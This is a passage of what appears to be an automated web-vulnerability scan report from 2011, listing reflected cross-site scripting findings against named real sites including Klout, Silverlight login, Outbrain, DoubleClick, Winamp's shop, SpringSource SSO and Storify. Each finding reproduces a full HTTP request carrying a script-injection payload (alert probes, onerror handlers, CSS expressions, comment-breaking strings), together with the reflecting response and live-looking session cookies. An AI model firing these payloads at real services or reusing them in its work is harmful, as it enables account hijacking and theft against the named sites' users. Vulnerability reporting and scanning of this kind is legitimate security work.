Referer: http://klout.com/blog/2011/02/from-hackathon-to-market-klout-for-chrome-beta/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1165085945-1298945312517; lcid=6f2ca7b2012e10009755722813cc6926; arrival_cookie=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; __unam=c3eadea-12e6f5153b2-24b418a5-2; __utmz=261428178.1298985351.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=261428178.294036745.1298985351.1298985351.1298985351.1; __utmc=261428178; __utmb=261428178.1.10.1298985351; _chartbeat2=b0kvk660j5l2swh4

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 13:16:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 10252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Leverage the Pow
...[SNIP]...
<a href="/auth/login?prev_page=/business?1d94c"><script>alert(1)</script>9392973573e=1">
...[SNIP]...

3.98. http://klout.com/perks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://klout.com
Path:   /perks

Request

GET /perks?192f9"><script>alert(1)</script>26632aecda2=1 HTTP/1.1
Host: klout.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1165085945-1298945312517; lcid=6f2ca7b2012e10009755722813cc6926; arrival_cookie=946777d531528b2bf363616794e8adfbf3a48382837f53a4fa6b4e82003a0526974db48ea4f920f48c3b864757984edb3b2affcac264f40be0a749dbeee6dcccaf73dc8a679fa939bfca6210272326684357b4a1eec6cb8fc932d3ed6a0a8f40aa83542a500525ba2c586f0403ca529fbb9359262d905db3103667ed0ff5c3e30599aafa7bfc86e7c0fd20683ba2f913c9065481b6b566c4368205c4dd0bc103da93b18067281aab4fb9cb99d44f3d100e68f8c27b01888ce88b7dd97bc69e05ad5c1e8b8aa5592d2dca061f375452281f4edf0b2a3f547401358d6de7475ee55f89ea64e19c36c98d7eb9c0988100b6bb485042d8a6367312664cd12069f3ed; __unam=c3eadea-12e6f5153b2-24b418a5-2; __utmz=261428178.1298985351.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=261428178.294036745.1298985351.1298985351.1298985351.1; __utmc=261428178; __utmb=261428178.2.10.1298985351; _chartbeat2=b0kvk660j5l2swh4

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 13:19:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 8775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Klout Perks</tit
...[SNIP]...
<a href="/auth/login?prev_page=/perks?192f9"><script>alert(1)</script>26632aecda2=1">
...[SNIP]...

3.99. http://lfov.net/webrecorder/g/chimera.js [vid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lfov.net
Path:   /webrecorder/g/chimera.js

Request

GET /webrecorder/g/chimera.js?vid=nulla35d3<img%20src%3da%20onerror%3dalert(1)>e181c272a5 HTTP/1.1
Host: lfov.net
Proxy-Connection: keep-alive
Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coyote-2-405e0b67=405e0b12:0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: LOOPFUSE="nulla35d3<img src=a onerror=alert(1)>e181c272a5"; Expires=Sun, 26-Feb-2012 23:20:13 GMT
Content-Length: 62
Date: Sat, 26 Feb 2011 23:20:13 GMT
Set-Cookie: Coyote-2-405e0b67=405e0b12:0; path=/


_lf_vid='nulla35d3<img src=a onerror=alert(1)>e181c272a5';


3.100. https://login.silverlight.net/login/signin.aspx [returnurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Request

GET /login/signin.aspx?returnurl='%22+ns%3dalert(0x0000C7)+e7252%20style%3dx%3aexpression(alert(1))%2070580878a19a89e29&__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEyNjc1MTYyMTZkZO%2FafV0CJRP%2B2ILM8De2o6zEhcVm&__EVENTVALIDATION=%2FwEWAgLNm4PjCwL0iqHzAh9XOTMNktAsCvWQ8c3pqepo2pjW&ctl00%24mainMiddle%24loginForm%24Button2=Sign+In HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://login.silverlight.net/login/signin.aspx?returnurl='%22%20ns=alert(0x0000C7)%20
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: login.silverlight.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: omniID=1296343609010_276c_8196_7f44_eaa48f639648; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dlogin.silverlight.net/login/signin.aspx%2526pidt%253D1%2526oid%253Dfunctiononclick%252528%252529%25257BWebForm_DoPostBackWithOptions%252528newWebForm_PostBackOptions%252528%252522ctl00%252524mainMiddle%252524loginFo%2526oidt%253D2%2526ot%253DSUBMIT%2526oi%253D111; ASP.NET_SessionId=1v2hdzef02l3bh4551flgsaj

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 03:42:10 GMT
Content-Length: 15573


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   The Of
...[SNIP]...
<a href="https://login.silverlight.net/login/createuser.aspx?returnurl='" ns=alert(0x0000C7) e7252 style=x:expression(alert(1)) 70580878a19a89e29">
...[SNIP]...

3.101. https://login.silverlight.net/login/signin.aspx [returnurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Request

GET /login/signin.aspx?returnurl=%27%22%20ns=alert(0x0000C7)%20212e3%20style%3dx%3aexpression(alert(1))%2019a86531afa HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=hxt33s55a1yyxpqmorzegwfx; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 03:36:53 GMT
Content-Length: 13338


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...
<a href="https://login.silverlight.net/login/createuser.aspx?returnurl='" ns=alert(0x0000C7) 212e3 style=x:expression(alert(1)) 19a86531afa">
...[SNIP]...

3.102. http://odb.outbrain.com/utils/get [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Request

GET /utils/get?url=http%3A%2F%2Fioerror.us%2F2008%2F08%2F07%2Ffinal-pictures-from-duncannon-pa%2F&srcUrl=http%3A%2F%2Fioerror.us%2Ffeed%2F&callback=outbrain_rater.returnedOdbData(${json},0)c68ad<script>alert(1)</script>2366c191886&settings=true&recs=true&widgetJSId=NA&key=AYQHSUWJ8576&idx=0&version=34924&ref=&apv=false&rand=0.05641490779817104&sig=RKWTKL3v HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://ioerror.us/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=0e0ed3f9-f76f-4651-916d-b47532550304; _lvd2="p47tkLgO+tdtgtEB03I2oA=="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="; _lvs2="23sEltQMc/A="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1298762384782; Domain=.outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="7/zvT3TaXCJmXWbf0AnD2g=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sat, 24-Mar-2012 23:19:44 GMT; Path=/
Set-Cookie: _lvd2=p47tkLgO+tfGFc5yucapKUbdFkigiXwa; Domain=outbrain.com; Expires=Sat, 05-Mar-2011 12:07:44 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sat, 24-Mar-2012 23:19:44 GMT; Path=/
Set-Cookie: recs-74e9af2a662553ecf44292c20c4860dc=MvvIA5NJ5MbSeIuLhJLcUx6zCEztQUccKNVKISEnv3I+5qyasF+vvXwOWIXEdmAo; Domain=outbrain.com; Expires=Sat, 26-Feb-2011 23:24:44 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 23:19:44 GMT
Content-Length: 2920

outbrain_rater.returnedOdbData({'response':{'exec_time':15,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'183663854','req_id':'090d60a89850a65f1f1aea8c35cf961d'},'score':{'preferred
...[SNIP]...
<\/span>','raterMode':'none','timeCounter':'0|10000|0','defaultRecNumber':4}}},0)c68ad<script>alert(1)</script>2366c191886

3.103. http://plancast.com/p/3zbp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://plancast.com
Path:   /p/3zbp

Request

GET /p/3zbp720bc"><script>alert(1)</script>445c1a2e4e3 HTTP/1.1
Host: plancast.com
Proxy-Connection: keep-alive
Referer: http://klout.com/blog/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.32
Date: Tue, 01 Mar 2011 14:12:30 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Set-Cookie: plancast=e909fb2ae059f20da24d8f3538d39450; path=/
Content-Length: 19150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS feed for this page" href="http://plancast.com/p/3zbp720bc"><script>alert(1)</script>445c1a2e4e3?feed=rss" />
...[SNIP]...

3.104. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Request

GET /gampad/ads?correlator=1298985737807&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&eid=32942002&client=ca-pub-7688935593152794&slotname=BlueKai-125x125-20117b7aa<script>alert(1)</script>95b1e7bb03c&page_slots=BlueKai-125x125-2011&cookie_enabled=1&url=http%3A%2F%2Fwww.adexchanger.com%2Femail%2Fliveintent%2F&ref=http%3A%2F%2Fliveintent.com%2Fcompany.php&lmt=1299007340&dt=1298985740396&cc=4&biw=1100&bih=939&ifi=1&adk=3739325169&u_tz=-360&u_his=5&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.2.154&gads=v2&ga_vid=896767388.1298985741&ga_sid=1298985741&ga_hid=922508149 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.adexchanger.com/email/liveintent/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 01 Mar 2011 13:23:38 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 1449

GA_googleSetAdContentsBySlotForSync({"BlueKai-125x125-20117b7aa<script>alert(1)</script>95b1e7bb03c":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f
...[SNIP]...

3.105. http://rapportive.com/stylesheets/jquery.fancybox-1.3.1.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rapportive.com
Path:   /stylesheets/jquery.fancybox-1.3.1.css

Request

GET /stylesheets/jquery.fancybox-1.3.1.css31665<script>alert(1)</script>087e397004e?4a4d1d85 HTTP/1.1
Host: rapportive.com
Proxy-Connection: keep-alive
Referer: http://rapportive.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _relascale_session=BAh7BjoPc2Vzc2lvbl9pZCIlM2ZiYzQ4Nzc0M2IwYzA1NTViM2UzMmU0Y2RlZjE5ZTI%3D--b39993fe2a728d46321dea2967c06a6b44ac819c

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Tue, 01 Mar 2011 13:16:13 GMT
Content-Type: text/plain
Connection: keep-alive
Content-Length: 96
X-Varnish: 2027515278
Age: 0
Via: 1.1 varnish

File not found: /stylesheets/jquery.fancybox-1.3.1.css31665<script>alert(1)</script>087e397004e

3.106. http://rapportive.com/stylesheets/website_screen.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rapportive.com
Path:   /stylesheets/website_screen.css

Request

GET /stylesheets/website_screen.css10865<script>alert(1)</script>7392b710d0?57daf1f9 HTTP/1.1
Host: rapportive.com
Proxy-Connection: keep-alive
Referer: http://rapportive.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _relascale_session=BAh7BjoPc2Vzc2lvbl9pZCIlM2ZiYzQ4Nzc0M2IwYzA1NTViM2UzMmU0Y2RlZjE5ZTI%3D--b39993fe2a728d46321dea2967c06a6b44ac819c

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Tue, 01 Mar 2011 13:16:14 GMT
Content-Type: text/plain
Connection: keep-alive
Content-Length: 88
X-Varnish: 2027515420
Age: 0
Via: 1.1 varnish

File not found: /stylesheets/website_screen.css10865<script>alert(1)</script>7392b710d0

3.107. https://shop.winamp.com/DRHM/store [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://shop.winamp.com
Path:   /DRHM/store

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /DRHM/store?Action=DisplayProductInterstitialDetailsPage&SiteID=winamp&Locale=en_US&ThemeID=1279300&productID=103591500&94384-->4321560c01e=1 HTTP/1.1
Host: shop.winamp.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828673274-New%7C1361900673274%3B%20s_nrgvo%3DNew%7C1361900673275%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/buy%252526ot%25253DA%3B; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=67280341872,0)
Date: Sun, 27 Feb 2011 17:47:17 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 14076


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!--!esi:include src="/store?94384-->4321560c01e=1&Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911800&StyleVersion=3&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ProductInterstitialDetailsPage
...[SNIP]...

3.108. https://shop.winamp.com/store [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://shop.winamp.com
Path:   /store

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store?Action=DisplayPage&Locale=en_US&SiteID=winamp&id=QuickBuyCartPage&741fc-->4ffb80c87d5=1 HTTP/1.1
Host: shop.winamp.com
Connection: keep-alive
Referer: http://forums.winamp.com/login.php?do=login
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828673274-New%7C1361900673274%3B%20s_nrgvo%3DNew%7C1361900673275%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/buy%252526ot%25253DA%3B; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=114525015766,0)
Date: Sun, 27 Feb 2011 17:47:47 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 101351


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!--!esi:include src="/store?741fc-->4ffb80c87d5=1&Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=QuickBuyCartPage"-->
...[SNIP]...

3.109. https://sso.springsource.com/cas/CSS/style-local.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://sso.springsource.com
Path:   /cas/CSS/style-local.css

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /cas/CSS/style-local.css?95a9b--><script>alert(1)</script>9b4f5397ba5=1 HTTP/1.1
Host: sso.springsource.com
Connection: keep-alive
Referer: https://sso.springsource.com/cas/login
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7C9BC52425484180BE814300480016B9; SESS708c3152436f834213664fa2546e7125=uh2urvu3ima6n61ue8i3usr4c5; _mkto_trk=id:649-KCC-493&token:_mch-springsource.com-1298990705899-69442

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 15:06:37 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 6218
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
   <head>
    <title>CAS &#8
...[SNIP]...
<a href="login?95a9b--><script>alert(1)</script>9b4f5397ba5=1&locale=en">
...[SNIP]...

3.110. https://sso.springsource.com/cas/login [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://sso.springsource.com
Path:   /cas/login

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /cas/login?38852--><script>alert(1)</script>f4d8a81df54=1 HTTP/1.1
Host: sso.springsource.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=33AC2E0E7EBEB877D285F60EA5D20EF4; SESS708c3152436f834213664fa2546e7125=uh2urvu3ima6n61ue8i3usr4c5; _mkto_trk=id:649-KCC-493&token:_mch-springsource.com-1298990705899-69442

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 15:05:50 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: JSESSIONID=677EA4F31D65A535E2F36786C50B39C6; Path=/cas; Secure
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 6218
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
   <head>
    <title>CAS &#8
...[SNIP]...
<a href="login?38852--><script>alert(1)</script>f4d8a81df54=1&locale=en">
...[SNIP]...

3.111. http://storify.com/klout/contest-winners-how-do-you-use-your-klout-for-good.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://storify.com
Path:   /klout/contest-winners-how-do-you-use-your-klout-for-good.json

Request

GET /klout/contest-winners-how-do-you-use-your-klout-for-good.json?callback=cbcontestwinnershowdoyouuseyourkloutforgood6dcec<script>alert(1)</script>25335923af5 HTTP/1.1
Host: storify.com
Proxy-Connection: keep-alive
Referer: http://klout.com/blog/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _sess=eyJpZCI6ImU5MjY1MTcxYmFmZjE3NGU0Yzc4NGVjY2E3YWQiLCJsYXN0QWNjZXNzIjoxMjk4OTg3MTY5NjUyLCJhdXRoIjp7fX0!56b75e32d6a0f727bda3501f38f5f4f2

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=100
Content-Type: application/json
Content-Length: 26197
Date: Tue, 01 Mar 2011 14:12:37 GMT
X-Varnish: 634703163
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

cbcontestwinnershowdoyouuseyourkloutforgood6dcec<script>alert(1)</script>25335923af5({
"editors": null,
"topics": null,
"published_at": 1297465279,
"permalink": "http://storify.com/klout/contest-winners-how-do-you-use-your-klout-for-good",
"shorturl": "http://sfy.c
...[SNIP]...

